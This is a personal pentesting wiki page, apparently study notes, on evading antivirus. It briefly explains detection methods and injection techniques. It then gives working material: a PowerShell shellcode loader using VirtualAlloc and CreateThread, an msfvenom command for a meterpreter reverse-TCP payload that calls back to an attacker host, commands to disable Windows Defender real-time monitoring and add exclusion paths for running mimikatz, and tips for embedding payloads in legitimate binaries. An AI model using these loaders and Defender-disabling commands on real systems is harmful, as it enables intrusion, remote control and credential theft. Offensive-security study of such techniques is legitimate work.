-
Notifications
You must be signed in to change notification settings - Fork 0
/
AV_Bypass.txt
166 lines (119 loc) · 6.59 KB
/
AV_Bypass.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.6
Creation-Date: 2021-10-19T15:39:38-05:00
====== AV Bypass ======
Created Tuesday 19 October 2021
===== Signature based detection =====
Some AV kits use signature based detection, which trying to detect the actual payload of malicious code in transit or filesystem.
This is considered a blacklist approach where each payload gets an entry on the black list.
This technique can never be catch-all, so when trying to get a payload on a system with AV, it's paramount to identify the vendor and version of the toolkit,
so it's strategy can be determined.
===== Heuristic detection =====
An AV tookit will try to decompile a payload and based on its instruction see if the payload is malicious.
===== Behavioural analysis =====
An AV toolkit will run the payload in an isolated environment and based on the behavior of the progam, determine if it's malicious
====== Evasion ======
There are generally two kinds of evasion:
* On disk
* In memory
==== On disk evasion ====
=== Packers ===
Packers intend to change the signature of the payload by making the executable smaller, yet functionally equivalent.
[[Tools:Linux:upx]] is a great tool for this, but one cannot rely on this alone to bypass modern anti-virus detection
=== Obfuscators ===
Primarily used by vendors to protect their IP, obfuscators are also used to evade AV detection.
The operate by mangling functions, inserting "dead code", splitting functions, etc to make detection harder.
This technique is marginally effective against AV detection.
=== Crypters ===
Simple. The payload is encrypted, but features a decryption stub that in-memory decrypts the payload and executes it.
This is the modern-dat basis of AV evasion
=== Protectors ===
These toolkits protect a binary against analysis, cracking, modifacation etc. Can also be used to protect your payload.
A current toolkit that provides a reasonable amount of protection is TheEnigmaProtector
===== In memory evasion =====
This techniques relies on manipulation of RAM, and thus intends to bypass AV, which most focus on malicious files stored on disk
=== Remote Process Memory Injection ===
This technique involves the injection malicious code into a ligit running program.
Windows API's are used to allocate memory into the remote process' memspace, injecting the payload into this space and make the program run in a separate thread.
=== Reflective DLL Injection ===
This is similar to DLL injection where a malicious DLL is loaded using the LoadLibrary API. However, to keep everything in memory, a DLL in memory is hooked into the target process.
Since Windows does not expose an API to do this, a developer needs to build one himself.
=== Process Hollowing ===
This technique involves starting a legit program in a suspended state. Then the program's image is removed and replaced by the malicous program.
Then the program is resumed, and the malicious code executed.
=== Inline hooking ===
A function of a program is hooked, ie control flow is redirected to malicous payload, then control is redirected to the legitimate program as if nothing happened.
====== Enumeration ======
{{{code: lang="texinfo" linenumbers="False"
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
}}}
* Will find places where defender won't look :)
====== Practial exploitation ======
{{{code: lang="powershell" linenumbers="True"
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]] $sc = <place your shellcode here>;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {
$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)
};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
}}}
This scripts does the following:
* Selects the functions VirtualAlloc and CreateThread from kernel32.dll, and memset from msvcrt.dll
* Allocates the size of the shellcode within powershell's process memory
* Loops over the bytecode and puts in the the allocated memory
* Creates a thread, with the allocated memory (having the shellcode) as starting point
===== Shellcode generation =====
The shellcode to be inserted into the <place your shellcode here> section can be generated as follows:
{{{code: lang="sh" linenumbers="False"
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<host> LPORT=<port> -f powershell -v sc
}}}
* Now save this wole blurp as a <file.ps1> file
===== Upload + execute =====
* Upload the whole thing onto your target system.
* Setup a meterpreter listener using msfconsole as described here: [[Tools:Linux:MetaSploit:payloads:meterpreter]]
* Execute as follows:
{{{code: lang="sh" linenumbers="False"
powershell -ExectionPolicy Bypass .\<filename>
}}}
===== Turn off Defender =====
Sometimes you want to run mimikatz, it won't let you and say:
{{{code: lang="texinfo" linenumbers="False"
The system cannot execute the specified program.
}}}
The following will turn off defender:
{{{code: lang="texinfo" linenumbers="False"
powershell Set-MpPreference -DisableRealtimeMonitoring $true
}}}
Verify with:
{{{code: lang="texinfo" linenumbers="False"
powershell Get-MpPrefence
}}}
===== Set exclusion path =====
You can specify an exclusion path where defender won't look
{{{code: lang="texinfo" linenumbers="False"
powershell Set-MpPreference -ExclusionPath <path>
}}}
* Now you can put your mimikatz there without it being kicked off
===== SHELLTER =====
Checkout [[Tools:Linux:shellter]] for a cool tool to inject payloads into a legitimate .exe file that when present on the filesystem won't trip AV detection.
===== MSFVENOM =====
* You can try to embed your payload in a ligit binary, much like shellter does using [[Tools:Linux:MetaSploit:msfvenom]]. Check the page for an example
* Also, you can try to increase the rounds of shikata-ga-nai
===== REMARKS =====
* AV have a harder time detecting malicious scripts, so powershell is a good candidate to perform the heavy lifting.
* Scripts can be easily altered if the AV can still detect it, without the need for recompilation
===== SEE =====
https://www.enigmaprotector.com/en/about.html
[[Tools:Linux:shellter]]